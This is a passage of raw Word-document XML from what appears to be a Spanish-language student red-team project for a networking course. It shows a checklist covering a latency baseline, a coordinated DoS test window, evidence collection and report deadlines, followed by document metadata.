          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] Línea base de latencia capturada antes del DoS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] DoS ejecutado en ventana coordinada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] Evidencia consolidada en /root/loot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] Borrador del informe revisado el 16 de mayo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] Informe final entregado el 23 de mayo.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Página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8"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Proyecto Final · Redes 2 · Red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2C2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534AB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C2C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3e5cd8a26b1dc2f00e61710c1b31297d26b6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Red Team — Proyecto Final Redes 2</dc:title>
  <dc:creator>Equipo Red Team</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-03T17:56:49.597Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-03T17:56:49.597Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>